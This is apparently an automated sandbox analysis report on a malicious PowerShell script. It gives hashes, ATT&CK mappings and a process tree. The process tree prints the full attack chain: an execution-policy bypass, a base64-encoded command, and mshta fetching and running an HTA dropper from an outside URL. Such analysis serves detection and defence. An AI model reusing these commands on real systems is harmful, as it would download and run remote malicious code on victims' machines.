1cd8713be5c57034fd24286ddd9e391af3540e22eb7e4396f68ba9fd842f86cc

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
05-09-2024 12:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

836ffd22263c910babc25497ac16ac849ec3ee9836691e9f8cf68ae4aa1fbf4e.ps1
Size

139B
MD5

bdf2ab5fbe5eb3ac97ab01d85667a6ba
SHA1

6b26a9551e70ff02464ef821626157e2523a7d09
SHA256

836ffd22263c910babc25497ac16ac849ec3ee9836691e9f8cf68ae4aa1fbf4e
SHA512

cc0136aee4253df82c8e5b68005aa156b6f1853915c9dd8a0945eca3bb1b34c79243baa3c5ac4c40c5d81138e5e34a66ef46aff7becc7ab1263cfc31b6e5d181

Score

10^/10

execution

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://getyourpages.com/downloads/t2

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2384	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2384	powershell.exe
2880	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2384	powershell.exe
Token: SeDebugPrivilege	2880	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2384 wrote to memory of 2880	2384	powershell.exe	29
PID 2384 wrote to memory of 2880	2384	powershell.exe	29
PID 2384 wrote to memory of 2880	2384	powershell.exe	29
PID 2880 wrote to memory of 2128	2880	powershell.exe	30
PID 2880 wrote to memory of 2128	2880	powershell.exe	30
PID 2880 wrote to memory of 2128	2880	powershell.exe	30

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\836ffd22263c910babc25497ac16ac849ec3ee9836691e9f8cf68ae4aa1fbf4e.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AZwBlAHQAeQBvAHUAcgBwAGEAZwBlAHMALgBjAG8AbQAvAGQAbwB3AG4AbABvAGEAZABzAC8AdAAyACIA
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2880
- - C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" https://getyourpages.com/downloads/t2
    3⤵
    - Modifies Internet Explorer settings
    PID:2128

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
85a8cc952e69d24642d595c03600d48c

SHA1
8ef214c481ebae3e0318bc1daa6166cee526ae60

SHA256
2265dc86eebfa3175ee04d7e80e1791d5a607f45999580c26face2879ea16213

SHA512
b3a4f73428230ae8139b7473ce48fad8036c39d529d6027efa8e19de0f01f66e457e305290f424bede773ee9a8b308686ea13d1609e69397bbf39c175949e436

Download Submit
memory/2384-4-0x000007FEF5ACE000-0x000007FEF5ACF000-memory.dmp

Filesize
4KB

Download
memory/2384-5-0x000000001B560000-0x000000001B842000-memory.dmp

Filesize
2.9MB

Download
memory/2384-6-0x00000000021E0000-0x00000000021E8000-memory.dmp

Filesize
32KB

Download
memory/2384-7-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

Filesize
9.6MB

Download
memory/2384-8-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

Filesize
9.6MB

Download
memory/2384-9-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

Filesize
9.6MB

Download
memory/2384-17-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

Filesize
9.6MB

Download
memory/2880-15-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

Filesize
9.6MB

Download
memory/2880-16-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

Filesize
9.6MB

Download